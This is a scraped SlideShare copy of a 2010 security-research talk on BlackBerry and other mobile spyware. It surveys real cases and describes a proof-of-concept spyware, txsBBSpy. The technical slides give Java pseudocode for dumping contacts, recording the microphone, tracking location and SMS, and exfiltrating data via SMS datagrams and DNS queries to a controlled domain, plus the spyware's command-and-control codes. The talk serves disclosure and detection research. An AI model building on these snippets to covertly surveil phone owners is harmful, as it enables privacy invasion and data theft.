SlideShare a Scribd company logo

iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware

Tyler Shields
Tyler Shields
Technology
1 of 54
Smartphone Backdoors An Analysis of Blackberry and Other Mobile Device Spyware The Monkey Steals The Berries
Presenter Background Currently Sr. Security Researcher, Veracode, Inc. Previously Security Consultant - Symantec Security Consultant - @Stake Incident Response and Forensics Handler – US Government Wishes He Was Infinitely Rich Personal Trainer to hot Hollywood starlets © 2010 Veracode, Inc. 3
Mobile Spyware  Often includes modifications to legitimate programs designed to compromise the device or device data  Often inserted by those who have legitimate access to source code or distribution binaries  May be intentional or inadvertent  Not specific to any particular programming language  Not specific to any particular mobile Operating System © 2010 Veracode, Inc. 4
Attacker Motivation  Practical method of compromise for many systems – Let the users install your backdoor on systems you have no access to – Looks like legitimate software so may bypass mobile AV  Retrieve and manipulate valuable private data – Looks like legitimate application traffic so little risk of detection  For high value targets such as financial services and government it becomes cost effective and more reliable – High-end attackers will not be content to exploit opportunistic vulnerabilities, which might be fixed and therefore unavailable at a critical juncture. They may seek to implant vulnerability for later exploitation – Think “Aurora” for Mobile Devices © 2010 Veracode, Inc. 5
Why is Mobile The Future of Spyware © 2010 Veracode, Inc. 6
Units Sold By Operating System 90,000.00 80,879 80,000.00 72,934 70,000.00 60,000.00 Units Sold 50,000.00 40,000.00 34,347 2008 Units 2009 Units 30,000.00 24,890 23,149 20,000.00 16,498 11,418 10,622 10,000.00 15,028 6,798 1,193 4,027 8,127 641 0 1,112 0.00 Symbian Research In iPhone OS Microsoft Linux Android WebOS Other OSs Motion Windows Mobile Data Source: DISTMO Appstore Analytics Operating System www.appstore.info © 2010 Veracode, Inc. 7
Units Sold Market Growth 8% 6% 6% Percentage Growth in Market Share 4% 3% 3% 2% 0% 0% Symbian Research In iPhone OS Microsoft Linux Android WebOS Other OSs 0% Motion Windows Mobile -2% -2% -3% -3% -4% -6% -6% Operating System Data Source: DISTMO Appstore Analytics www.appstore.info © 2010 Veracode, Inc. 8
Application Counts 160,000 150,998 140,000 120,000 Number Of Applications In Store Last Counted Jan/Feb 2010 100,000 80,000 60,000 40,000 19,897 20,000 6118 5291 1452 944 0 iPhone App Store Android Nokia Ovi Store Blackberry App Palm App Catalog Windows Marketplace (Maemo) World Marketplace Data Source: DISTMO Appstore Analytics Marketplace Name www.appstore.info © 2010 Veracode, Inc. 9
iPhone Applications Sold 3.00 Applications Sold (In Billions) 2.50 2.00 1.50 1.00 0.50 0.00 Data Source: Gartner, Inc., a research and advisory firm © 2010 Veracode, Inc. 10
Back To The Future © 2010 Veracode, Inc. 11
Back To The Future © 2010 Veracode, Inc. 12
Case Studies of Mobile Spyware © 2010 Veracode, Inc. 13
FlexiSpy  http://www.flexispy.com  $149 - $350 PER YEAR depending on features  Features – Remote Listening – C&C Over SMS – SMS and Email Logging – Call History Logging – Location Tracking – Call Interception – GPS Tracking – Symbian, Blackberry, Windows Mobile Supported © 2010 Veracode, Inc. 14
Mobile Spy  http://www.mobile-spy.com  $49.97 PER QUARTER or $99.97 PER YEAR  Features – SMS Logging – Call Logging – GPS Logging – Web URL Logging – BlackBerry, iPhone (Jailbroken Only), Android, Windows Mobile or Symbian © 2010 Veracode, Inc. 16
Etisalat (SS8)  Cell carrier in United Arab Emirates (UAE)  Pushed via SMS as “software patch” for Blackberry smartphones  Upgrade urged to “enhance performance” of Blackberry service  Blackberry PIN messaging as C&C  Sets FLAG_HIDDEN bit to true  Interception of outbound email / SMS only  Discovered due to flooded listener server cause retries that drained batteries of affected devices  Accidentally released the .jar as well as the .cod (ooopsie?!) © 2010 Veracode, Inc. 18
Bugs & Phonesnoop  Bugs – Exfiltration of inbound and outbound email – Hidden  PhoneSnoop – Remotely turn on a Blackberry phone microphone – Listen in on target ambient conversation © 2010 Veracode, Inc. 19
Storm8 Phone Number Farming – iMobsters and Vampires Live (and others) – “Storm8 has written the software for all its games in such a way that it automatically accesses, collects, and transmits the wireless telephone number of each iPhone user who downloads any Storm8 game," the suit alleges. " ... Storm8, though, has no reason whatsoever to access the wireless phone numbers of the iPhones on which its games are installed." – “Storm8 says that this code was used in development tests, only inadvertently remained in production builds, and removed as soon as it was alerted to the issue.” – These were available via the iTunes App Store! – http://www.boingboing.net/2009/11/05/iphone-game-dev-accu.html © 2010 Veracode, Inc. 20
Symbian Sexy Space – Poses as legitimate server ACSServer.exe – Calls itself 'Sexy Space„ – Steals phone and network information – Exfiltrates data via hacker owned web site connection – Can SPAM contact list members – Basically a “botnet” for mobile phones – Signing process  Anti-virus scan using F-Secure - Approx 43% proactive detection rate (PCWorld)  Random selection of inbound manually assessed – Symbian signed this binary as safe! – http://news.zdnet.co.uk/security/0,1000000189,39684313,00.htm © 2010 Veracode, Inc. 21
09Droid – Banking Applications Attack – Droid app that masquerades as any number of different target banking applications – Target banks included  Royal Bank of Canada  Chase  BB&T  SunTrust  Over 50 total financial institutions were affected – May steal and exfiltrate banking credentials – Approved and downloaded from Google’s Android Marketplace! – http://www.theinquirer.net/inquirer/news/1585716/fraud-hits-android-apps- market – http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3209953 – http://www.f-secure.com/weblog/archives/00001852.html © 2010 Veracode, Inc. 23
Blackberry Security Mechanisms © 2010 Veracode, Inc. 24
Blackberry Takes Security Seriously  KB05499: Protecting the BlackBerry smartphone and BlackBerry Enterprise Server against malware http://www.blackberry.com/btsc/search.do?cmd=displayKC&docTyp e=kc&externalId=KB05499  Protecting the BlackBerry device platform against malware http://docs.blackberry.com/en/admin/deliverables/1835/Protecting the BlackBerry device platform against malware.pdf  Placing the BlackBerry Enterprise Solution in a segmented network http://docs.blackberry.com/en/admin/deliverables/1460/Placing_the_ BlackBerry_Enterprise_Solution_in_a_Segmented_Network.pdf  BlackBerry Enterprise Server Policy Reference Guide http://docs.blackberry.com/en/admin/deliverables/7228/Policy_Refer ence_Guide.pdf © 2010 Veracode, Inc. 25
Does It Really Matter?! Only 23% of smartphone owners use the security software installed on the devices. (Source: Trend Micro Inc. survey of 1,016 U.S. smartphone users, June 2009) 13% of organizations currently protect from mobile viruses (Mobile Security 2009 Survey by Goode Intelligence) © 2010 Veracode, Inc. 26
Code Signing  Subset of Blackberry API considered “controlled”  Use of controlled package, class, or method requires appropriate code signature  Blackberry Signature Tool comes with the Blackberry JDE  Acquire signing keys by filling out a web form and paying $20 – This not is a high barrier to entry – 48 hours later you receive signing keys  Install keys into signature tool © 2010 Veracode, Inc. 27
Code Signing Process  Hash of code sent to RIM for API tracking purposes only  RIM does not get source code  COD file is signed based on required keys  Application ready to be deployed  Easy to acquire anonymous keys © 2010 Veracode, Inc. 28
IT Policies  Requires connection to Blackberry Enterprise Server (BES)  Supersedes lower levels of security restrictions  Prevent devices from downloading third-party applications over wireless  Prevent installation of specific third-party applications  Control permissions of third party applications – Allow Internal Connections – Allow Third-Party Apps to Use Serial Port – Allow External Connections  MOSTLY “Default Allow All” policy for BES and non-BES devices © 2010 Veracode, Inc. 29
Application Policies  Can be controlled at the BES  If no BES present, controls are set on the handheld itself  Can only be MORE restrictive than the IT policy, never less  Control individual resource access per application  Control individual connection access per application  MOSTLY “Default Allow All” policy for BES and non-BES devices © 2010 Veracode, Inc. 30
V4.7.0.148 Default 3rd Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Browser Filtering Recording Reset Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 31
V5.0.0.328 Default 3rd Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Server Network Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Display Information Browser Filtering Recording Reset While Locked Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 32
V5.0.0.328 Trusted 3rd Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Server Network Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Display Information Browser Filtering Recording Reset While Locked Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 33
Installation Methods © 2010 Veracode, Inc. 34
Installation Methods  Accessing a web site using the BlackBerry Browser and choosing to download the application over the network (OTA Installation)  Running the application loader tool of the BlackBerry Desktop Manager and choosing to download the application onto the BlackBerry device using a physical connection to the computer  Blackberry BES push the application to your user community  Get it into the Blackberry App World and let the user choose to install it for you! © 2010 Veracode, Inc. 35
Installation Files  .COD files: A COD file is a proprietary file format developed by RIM that contains compiled and packaged application code.  .JAD files: An application descriptor that stores information about the application itself and the location of .COD files  .JAR files: a JAR file (or Java ARchive) is used for aggregating many files into one. It is generally used to distribute Java classes and associated metadata.  .ALX files: Similar to the .JAD file, in that it holds information about where the installation files for the application are located © 2010 Veracode, Inc. 36
txsBBSpy Effects and Behaviors © 2010 Veracode, Inc. 37
txsBBSpy Logging and Dumping Monitor connected / disconnected calls Monitor PIM added / removed / updated Monitor inbound SMS Monitor outbound SMS Real Time track GPS coordinates Dump all contacts Dump current location Dump phone logs Dump email Dump microphone capture (security prompted) © 2010 Veracode, Inc. 38
txsBBSpy Exfiltration and C&C Methods SMS (No CDMA) SMS Datagrams (Supports CDMA) Email HTTP GET HTTP POST TCP Socket UDP Socket DNS Exfiltration Default command and control to inbound SMS TXSPROTO Bidirectional TCP based command and control © 2010 Veracode, Inc. 39
txsBBSpy Technical Specifications © 2010 Veracode, Inc. 40
Technical Methods  Data Dumpers  Listeners  Exfiltration Methods  Command and Control © 2010 Veracode, Inc. 41
Dump Contact Information  API – javax.microedition.pim – net.rim.blackberry.API.pdap  Pseudocode PIM pim = PIM.getInstance(); BlackBerryPIMList contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY); Enumeration eContacts = contacts.items(); Contact contact = (Contact) eContacts.nextElement(); if (contacts.isSupportedField(Contact.EMAIL)) { if (contact.countValues(Contact.EMAIL) > 0) email = contact.getString(Contact.EMAIL, 0); } © 2010 Veracode, Inc. 42
Dump Microphone  API – javax.microedition.media.control – javax.microedition.media.manager – javax.microedition.media.player  Pseudocode Player p = Manager.createPlayer("capture://audio"); RecordControl rc = (RecordControl)p.getControl("RecordControl"); ByteArrayOutputStream os = new ByteArrayOutputStream(); rc.setRecordStream(os); rc.startRecord(); © 2010 Veracode, Inc. 43
Location Listener  Create the class that implements LocationListener Interface  Get LocationProvider instance  Add LocationListener  API – javax.microedition.location.LocationProvider.getInstance – javax.microedition.location.LocationProvider.setLocationListener  Pseudocode ll = new LocListener(); lp = LocationProvider.getInstance(null); lp.setLocationListener(ll, 1, 1, 1); © 2010 Veracode, Inc. 47
SMS Outbound Listener  Create class that implements “SendListener” interface  Add the SendListener  API – net.rim.blackberry.api.sms.SMS – javax.wireless.messaging.TextMessage  Pseudocode sl = new SMSOUTListener(); SMS.addSendListener(sl); © 2010 Veracode, Inc. 48
PIM Listener  Create the class that implements PIMListListener Interface  Open Target PIMList and Add PIMListListener  API – javax.microedition.pim.PIM.getInstance() – net.rim.blackberry.api.pdap.BlackBerryPIMList.addListener  Pseudocode pl = new PhoneLogger(); pim = PIM.getInstance(); contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY); contacts.addListener(piml); © 2010 Veracode, Inc. 51
SMS Datagram Exfiltration  API – javax.microedition.io.Connector – javax.microedition.io.DatagramConnection – javax.microedition.io.Datagram  Pseudocode DatagramConnection dc = (DatagramConnection)Connector.open("sms://"+this.pnum+":3590 "); Datagram d = dc.newDatagram(dc.getMaximumLength()); byte[] buf = msg.getBytes(); d.setData(buf, 0, buf.length); d.write(buf, 0, buf.length); dc.send(d); © 2010 Veracode, Inc. 52
DNS Exfiltration do { // Code to trim the message to 200 chars per iteration } try { msg2 = Base64OutputStream.encodeAsString(msg2.getBytes(), 0, msg2.length(), false, false); conn = (DatagramConnection)Connector.open("udp://"+msg2+"."+this.domain+":7272;4444 "); conn.close(); } catch (ConnectionNotFoundException e) { return; } catch (IOException e){ // Do nothing, just catch and ignore } } while (msg.length() > 200); © 2010 Veracode, Inc. 54
Threaded Exfiltration  Listener based exfiltration methods use separate thread  Doesn‟t freeze UI interface  Queues messages outbound if network is slow  ThreadedSend extends Thread class  Uses run() method to call exfiltrate() © 2010 Veracode, Inc. 58
Command and Control Channels  Default is inbound SMS communication  Bi-drectional TXSPROTO TCP based command and control – Additional Stealth (intentionally not completely invisible) – Allows for pretty GUI clients (basic mock up done) – Will more easily allow for control of multiple victims – Can be used to easily implement novelty attacks  Swap the contact databases of two victims  Easily have phone A call phone B  Integrated Google earth tracking of victim without parsing return email responses  Much more shenanigans! © 2010 Veracode, Inc. 59
Command and Control Channels  initCandC(int a) – Initializes inbound SMS listener if passed a == 1 – Kills spyware otherwise – Listens for commands and acts accordingly TXSDIE TXSPHLON TXSPHLOFF TXSPIMON TXSPIMOFF TXSSLINON TXSSLINOFF TXSSLOUTON TXSSLOUTOFF TXSGLON TXSGLOFF TXSEXFILSMS TXSEXFILSMSDG TXSEXFILEMAIL TXSEXFILGET TXSEXFILPOST TXSEXFILTCP TXSEXFILUDP TXSEXFILDNS TXSDUMPGPS TXSDUMPPL TXSDUMPEMAIL TXSDUMPMIC TXSDUMPCON TXSPROTO TXSPORT[PORT] TXSPHONE:[PN] TXSURL[URL] TXSGTIME:[N] TXSPING TXS:[HOST] TXSIP:[IP] TXSEM:[EMAIL] © 2010 Veracode, Inc. 60
Methods of Detection and Future Work © 2010 Veracode, Inc. 61
Methods of Detection  Additional Operating System Prompts – Remove the “Trust Application” prompt requiring individual configuration  Signature Based – This is how the current anti-virus world is failing  Sandbox Based Execution Heuristics – Still requires execution in a sandbox and is reactive – Can‟t ensure complete execution  Static Decompilation and Analysis – Enumeration of sources of sensitive taint and exfiltration sinks – Control/Data flow mapping for tracing sensitive taint from source to sink – Compare findings against expected values © 2010 Veracode, Inc. 62
Future Work (Offensive AND Defensive)  Reverse engineer .cod file format  Continued research into unobstructed installation methods (requires exploitation)  Infect PC with virus that acts as distribution hub  Research additional exfiltration methods for tunneling without prompting  Unrelated but interesting (Other cool ideas) – Memory walking for unsigned persistent and runtime storage – Combine coddec with application downloads from marketplace – Enumerate marketplace for existence of backdoors © 2010 Veracode, Inc. 63
Demonstration © 2010 Veracode, Inc. 64
Conclusion  We are currently trusting the vendor application store provider for the majority of our mobile device security  Minimal methods of real time eradication or detection of spyware type activities  No easy/automated way to confirm for ourselves what the applications are actually doing © 2010 Veracode, Inc. 65
The Monkey Steals the Berries! Questions? © 2010 Veracode, Inc. 66
Questions?

Recommended

BRUCon 2010 - The Monkey Steals the Berries
BRUCon 2010 - The Monkey Steals the BerriesBRUCon 2010 - The Monkey Steals the Berries
BRUCon 2010 - The Monkey Steals the BerriesTyler Shields
 
Software Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the BerriesSoftware Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the BerriesTyler Shields
 
IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
IT Hot Topics 2010 - The Coming Wave of Smartphone AttacksIT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
IT Hot Topics 2010 - The Coming Wave of Smartphone AttacksTyler Shields
 
The Coming Wave of Smartphone Attacks - Texas DIR
The Coming Wave of Smartphone Attacks - Texas DIRThe Coming Wave of Smartphone Attacks - Texas DIR
The Coming Wave of Smartphone Attacks - Texas DIRTyler Shields
 
Source Boston 2010 - The Monkey Steals the Berries Part Deux
Source Boston 2010 - The Monkey Steals the Berries Part DeuxSource Boston 2010 - The Monkey Steals the Berries Part Deux
Source Boston 2010 - The Monkey Steals the Berries Part DeuxTyler Shields
 
Raleigh ISSA 2010 - The Monkey Steals the Berries
Raleigh ISSA 2010 - The Monkey Steals the BerriesRaleigh ISSA 2010 - The Monkey Steals the Berries
Raleigh ISSA 2010 - The Monkey Steals the BerriesTyler Shields
 
GovCert.NL - The Monkey Steals The Berries
GovCert.NL - The Monkey Steals The BerriesGovCert.NL - The Monkey Steals The Berries
GovCert.NL - The Monkey Steals The BerriesTyler Shields
 
AdMob Mobile Metrics Report - March 2010
AdMob Mobile Metrics Report - March 2010AdMob Mobile Metrics Report - March 2010
AdMob Mobile Metrics Report - March 2010AdMob Inc
 

Recommended

BRUCon 2010 - The Monkey Steals the Berries
BRUCon 2010 - The Monkey Steals the BerriesBRUCon 2010 - The Monkey Steals the Berries
BRUCon 2010 - The Monkey Steals the BerriesTyler Shields
 
Software Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the BerriesSoftware Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the BerriesTyler Shields
 
IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
IT Hot Topics 2010 - The Coming Wave of Smartphone AttacksIT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
IT Hot Topics 2010 - The Coming Wave of Smartphone AttacksTyler Shields
 
The Coming Wave of Smartphone Attacks - Texas DIR
The Coming Wave of Smartphone Attacks - Texas DIRThe Coming Wave of Smartphone Attacks - Texas DIR
The Coming Wave of Smartphone Attacks - Texas DIRTyler Shields
 
Source Boston 2010 - The Monkey Steals the Berries Part Deux
Source Boston 2010 - The Monkey Steals the Berries Part DeuxSource Boston 2010 - The Monkey Steals the Berries Part Deux
Source Boston 2010 - The Monkey Steals the Berries Part DeuxTyler Shields
 
Raleigh ISSA 2010 - The Monkey Steals the Berries
Raleigh ISSA 2010 - The Monkey Steals the BerriesRaleigh ISSA 2010 - The Monkey Steals the Berries
Raleigh ISSA 2010 - The Monkey Steals the BerriesTyler Shields
 
GovCert.NL - The Monkey Steals The Berries
GovCert.NL - The Monkey Steals The BerriesGovCert.NL - The Monkey Steals The Berries
GovCert.NL - The Monkey Steals The BerriesTyler Shields
 
AdMob Mobile Metrics Report - March 2010
AdMob Mobile Metrics Report - March 2010AdMob Mobile Metrics Report - March 2010
AdMob Mobile Metrics Report - March 2010AdMob Inc
 
Neli Vacheva - IDC
Neli Vacheva - IDCNeli Vacheva - IDC
Neli Vacheva - IDCIvo_Dreshkov
 
Facebook: an investment for the future
Facebook: an investment for the futureFacebook: an investment for the future
Facebook: an investment for the futureIdeas4Tomorrow
 
Somo - Investing in a Mobile Strategy (UK specific)
Somo - Investing in a Mobile Strategy (UK specific)Somo - Investing in a Mobile Strategy (UK specific)
Somo - Investing in a Mobile Strategy (UK specific)Ross Sleight
 
Mobile Services in Japan
Mobile Services in JapanMobile Services in Japan
Mobile Services in JapanMobileMonday Norway
 
Мониторинг рынка плоского стекла
Мониторинг рынка плоского стеклаМониторинг рынка плоского стекла
Мониторинг рынка плоского стеклаAgency of Industrial Marketing
 
Mobile Vas
Mobile VasMobile Vas
Mobile Vasajaytripti
 
2004* 5o.Encontro Anual De Investidores Da Embraer ApresentaçãO Financeira ...
2004* 5o.Encontro Anual De Investidores Da Embraer ApresentaçãO Financeira ...2004* 5o.Encontro Anual De Investidores Da Embraer ApresentaçãO Financeira ...
2004* 5o.Encontro Anual De Investidores Da Embraer ApresentaçãO Financeira ...Embraer RI
 
Snapshot on the French Oncology Market March 2010
Snapshot on the French Oncology Market March 2010Snapshot on the French Oncology Market March 2010
Snapshot on the French Oncology Market March 2010thomasmartinelli94
 
2006* Farnborough Airshow ApresentaçãO Financeira
2006* Farnborough Airshow ApresentaçãO Financeira2006* Farnborough Airshow ApresentaçãO Financeira
2006* Farnborough Airshow ApresentaçãO FinanceiraEmbraer RI
 
A DECISION SUPPORT SYSTEM TO DETERMINE THE SPORT SPONSORSHIP RESPONSE
A DECISION SUPPORT SYSTEM TO DETERMINE THE SPORT SPONSORSHIP RESPONSE A DECISION SUPPORT SYSTEM TO DETERMINE THE SPORT SPONSORSHIP RESPONSE
A DECISION SUPPORT SYSTEM TO DETERMINE THE SPORT SPONSORSHIP RESPONSE Mine ISIK
 
Tarik Fawzi, AEneas #Maduk
Tarik Fawzi, AEneas #MadukTarik Fawzi, AEneas #Maduk
Tarik Fawzi, AEneas #MadukJames Cameron
 
Media landscape updater i 2012
Media landscape updater i 2012Media landscape updater i 2012
Media landscape updater i 2012MediaDirectionOMD
 
Ad Mob Mobile Metrics Feb 10
Ad Mob Mobile Metrics Feb 10Ad Mob Mobile Metrics Feb 10
Ad Mob Mobile Metrics Feb 10bianchiassociates
 
Proyecto final presentacion (1)
Proyecto final presentacion (1)Proyecto final presentacion (1)
Proyecto final presentacion (1)joerma2011
 
Nutricosmètica- Alimentar la bellesa
Nutricosmètica- Alimentar la bellesaNutricosmètica- Alimentar la bellesa
Nutricosmètica- Alimentar la bellesaLa Tavella
 
Curs04
Curs04Curs04
Curs04Cristian-Mihai Pomohaci
 
O PROCESSO - Franz Kafka
O PROCESSO - Franz KafkaO PROCESSO - Franz Kafka
O PROCESSO - Franz KafkaCarlos Elson Cunha
 
Koran Pelajar Gratis Januari
Koran Pelajar Gratis JanuariKoran Pelajar Gratis Januari
Koran Pelajar Gratis JanuariKoran Pelajar
 
Xabierreko gaztelua
Xabierreko gazteluaXabierreko gaztelua
Xabierreko gazteluasanmigelhh
 
Winner Never Quit
Winner Never QuitWinner Never Quit
Winner Never Quitamit_paropkari
 
Nutrición (grupo 1)
Nutrición (grupo 1)Nutrición (grupo 1)
Nutrición (grupo 1)Universidad de Oviedo
 
Volantino Picam7
Volantino Picam7Volantino Picam7
Volantino Picam7AUGUSTA TECNOLOGIE SOFTWARE
 

More Related Content

What's hot

Neli Vacheva - IDC
Neli Vacheva - IDCNeli Vacheva - IDC
Neli Vacheva - IDCIvo_Dreshkov
 
Facebook: an investment for the future
Facebook: an investment for the futureFacebook: an investment for the future
Facebook: an investment for the futureIdeas4Tomorrow
 
Somo - Investing in a Mobile Strategy (UK specific)
Somo - Investing in a Mobile Strategy (UK specific)Somo - Investing in a Mobile Strategy (UK specific)
Somo - Investing in a Mobile Strategy (UK specific)Ross Sleight
 
Мониторинг рынка плоского стекла
Мониторинг рынка плоского стеклаМониторинг рынка плоского стекла
Мониторинг рынка плоского стеклаAgency of Industrial Marketing
 
2004* 5o.Encontro Anual De Investidores Da Embraer ApresentaçãO Financeira ...
2004* 5o.Encontro Anual De Investidores Da Embraer ApresentaçãO Financeira ...2004* 5o.Encontro Anual De Investidores Da Embraer ApresentaçãO Financeira ...
2004* 5o.Encontro Anual De Investidores Da Embraer ApresentaçãO Financeira ...Embraer RI
 
Snapshot on the French Oncology Market March 2010
Snapshot on the French Oncology Market March 2010Snapshot on the French Oncology Market March 2010
Snapshot on the French Oncology Market March 2010thomasmartinelli94
 
2006* Farnborough Airshow ApresentaçãO Financeira
2006* Farnborough Airshow ApresentaçãO Financeira2006* Farnborough Airshow ApresentaçãO Financeira
2006* Farnborough Airshow ApresentaçãO FinanceiraEmbraer RI
 
A DECISION SUPPORT SYSTEM TO DETERMINE THE SPORT SPONSORSHIP RESPONSE
A DECISION SUPPORT SYSTEM TO DETERMINE THE SPORT SPONSORSHIP RESPONSE A DECISION SUPPORT SYSTEM TO DETERMINE THE SPORT SPONSORSHIP RESPONSE
A DECISION SUPPORT SYSTEM TO DETERMINE THE SPORT SPONSORSHIP RESPONSE Mine ISIK
 
Tarik Fawzi, AEneas #Maduk
Tarik Fawzi, AEneas #MadukTarik Fawzi, AEneas #Maduk
Tarik Fawzi, AEneas #MadukJames Cameron
 
Media landscape updater i 2012
Media landscape updater i 2012Media landscape updater i 2012
Media landscape updater i 2012MediaDirectionOMD
 
Ad Mob Mobile Metrics Feb 10
Ad Mob Mobile Metrics Feb 10Ad Mob Mobile Metrics Feb 10
Ad Mob Mobile Metrics Feb 10bianchiassociates
 

What's hot (13)

Neli Vacheva - IDC
Neli Vacheva - IDCNeli Vacheva - IDC
Neli Vacheva - IDC
 
Facebook: an investment for the future
Facebook: an investment for the futureFacebook: an investment for the future
Facebook: an investment for the future
 
Somo - Investing in a Mobile Strategy (UK specific)
Somo - Investing in a Mobile Strategy (UK specific)Somo - Investing in a Mobile Strategy (UK specific)
Somo - Investing in a Mobile Strategy (UK specific)
 
Mobile Services in Japan
Mobile Services in JapanMobile Services in Japan
Mobile Services in Japan
 
Мониторинг рынка плоского стекла
Мониторинг рынка плоского стеклаМониторинг рынка плоского стекла
Мониторинг рынка плоского стекла
 
Mobile Vas
Mobile VasMobile Vas
Mobile Vas
 
2004* 5o.Encontro Anual De Investidores Da Embraer ApresentaçãO Financeira ...
2004* 5o.Encontro Anual De Investidores Da Embraer ApresentaçãO Financeira ...2004* 5o.Encontro Anual De Investidores Da Embraer ApresentaçãO Financeira ...
2004* 5o.Encontro Anual De Investidores Da Embraer ApresentaçãO Financeira ...
 
Snapshot on the French Oncology Market March 2010
Snapshot on the French Oncology Market March 2010Snapshot on the French Oncology Market March 2010
Snapshot on the French Oncology Market March 2010
 
2006* Farnborough Airshow ApresentaçãO Financeira
2006* Farnborough Airshow ApresentaçãO Financeira2006* Farnborough Airshow ApresentaçãO Financeira
2006* Farnborough Airshow ApresentaçãO Financeira
 
A DECISION SUPPORT SYSTEM TO DETERMINE THE SPORT SPONSORSHIP RESPONSE
A DECISION SUPPORT SYSTEM TO DETERMINE THE SPORT SPONSORSHIP RESPONSE A DECISION SUPPORT SYSTEM TO DETERMINE THE SPORT SPONSORSHIP RESPONSE
A DECISION SUPPORT SYSTEM TO DETERMINE THE SPORT SPONSORSHIP RESPONSE
 
Tarik Fawzi, AEneas #Maduk
Tarik Fawzi, AEneas #MadukTarik Fawzi, AEneas #Maduk
Tarik Fawzi, AEneas #Maduk
 
Media landscape updater i 2012
Media landscape updater i 2012Media landscape updater i 2012
Media landscape updater i 2012
 
Ad Mob Mobile Metrics Feb 10
Ad Mob Mobile Metrics Feb 10Ad Mob Mobile Metrics Feb 10
Ad Mob Mobile Metrics Feb 10
 

Viewers also liked

Proyecto final presentacion (1)
Proyecto final presentacion (1)Proyecto final presentacion (1)
Proyecto final presentacion (1)joerma2011
 
Nutricosmètica- Alimentar la bellesa
Nutricosmètica- Alimentar la bellesaNutricosmètica- Alimentar la bellesa
Nutricosmètica- Alimentar la bellesaLa Tavella
 
Koran Pelajar Gratis Januari
Koran Pelajar Gratis JanuariKoran Pelajar Gratis Januari
Koran Pelajar Gratis JanuariKoran Pelajar
 
Xabierreko gaztelua
Xabierreko gazteluaXabierreko gaztelua
Xabierreko gazteluasanmigelhh
 
RISE background for project board mtg 2011 04-01
RISE background for project board mtg 2011 04-01RISE background for project board mtg 2011 04-01
RISE background for project board mtg 2011 04-01Liz Work
 
Green ICT Application Challenge São Paulo
Green ICT Application Challenge São PauloGreen ICT Application Challenge São Paulo
Green ICT Application Challenge São Pauloappies_co
 
How Digital Trends Are Compressing Processes
How Digital Trends Are Compressing ProcessesHow Digital Trends Are Compressing Processes
How Digital Trends Are Compressing ProcessesSharon Richardson
 
Luis Hernandez Power Point
Luis Hernandez Power PointLuis Hernandez Power Point
Luis Hernandez Power Pointalumniupc
 
Switzerland, Abi Mc
Switzerland, Abi McSwitzerland, Abi Mc
Switzerland, Abi Mcguest16ba2d
 
NPC Interim 2008
NPC Interim 2008NPC Interim 2008
NPC Interim 2008MediaSauce
 
eWomenNetwork - Pam Vaccaro presentation 1/8/10
eWomenNetwork - Pam Vaccaro presentation 1/8/10eWomenNetwork - Pam Vaccaro presentation 1/8/10
eWomenNetwork - Pam Vaccaro presentation 1/8/10dgamache
 

Viewers also liked (20)

Proyecto final presentacion (1)
Proyecto final presentacion (1)Proyecto final presentacion (1)
Proyecto final presentacion (1)
 
Nutricosmètica- Alimentar la bellesa
Nutricosmètica- Alimentar la bellesaNutricosmètica- Alimentar la bellesa
Nutricosmètica- Alimentar la bellesa
 
Curs04
Curs04Curs04
Curs04
 
O PROCESSO - Franz Kafka
O PROCESSO - Franz KafkaO PROCESSO - Franz Kafka
O PROCESSO - Franz Kafka
 
Koran Pelajar Gratis Januari
Koran Pelajar Gratis JanuariKoran Pelajar Gratis Januari
Koran Pelajar Gratis Januari
 
Xabierreko gaztelua
Xabierreko gazteluaXabierreko gaztelua
Xabierreko gaztelua
 
Winner Never Quit
Winner Never QuitWinner Never Quit
Winner Never Quit
 
Nutrición (grupo 1)
Nutrición (grupo 1)Nutrición (grupo 1)
Nutrición (grupo 1)
 
Volantino Picam7
Volantino Picam7Volantino Picam7
Volantino Picam7
 
RISE background for project board mtg 2011 04-01
RISE background for project board mtg 2011 04-01RISE background for project board mtg 2011 04-01
RISE background for project board mtg 2011 04-01
 
Green ICT Application Challenge São Paulo
Green ICT Application Challenge São PauloGreen ICT Application Challenge São Paulo
Green ICT Application Challenge São Paulo
 
Guía 17 09-2013 (2)
Guía 17 09-2013 (2)Guía 17 09-2013 (2)
Guía 17 09-2013 (2)
 
How Digital Trends Are Compressing Processes
How Digital Trends Are Compressing ProcessesHow Digital Trends Are Compressing Processes
How Digital Trends Are Compressing Processes
 
Luis Hernandez Power Point
Luis Hernandez Power PointLuis Hernandez Power Point
Luis Hernandez Power Point
 
Switzerland, Abi Mc
Switzerland, Abi McSwitzerland, Abi Mc
Switzerland, Abi Mc
 
NPC Interim 2008
NPC Interim 2008NPC Interim 2008
NPC Interim 2008
 
Busiess1
Busiess1Busiess1
Busiess1
 
Luis html
Luis htmlLuis html
Luis html
 
eWomenNetwork - Pam Vaccaro presentation 1/8/10
eWomenNetwork - Pam Vaccaro presentation 1/8/10eWomenNetwork - Pam Vaccaro presentation 1/8/10
eWomenNetwork - Pam Vaccaro presentation 1/8/10
 
Ex oo2
Ex oo2Ex oo2
Ex oo2
 

Similar to iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware

The rules of mobile advertising
The rules of mobile advertisingThe rules of mobile advertising
The rules of mobile advertisingSeungyul Kim
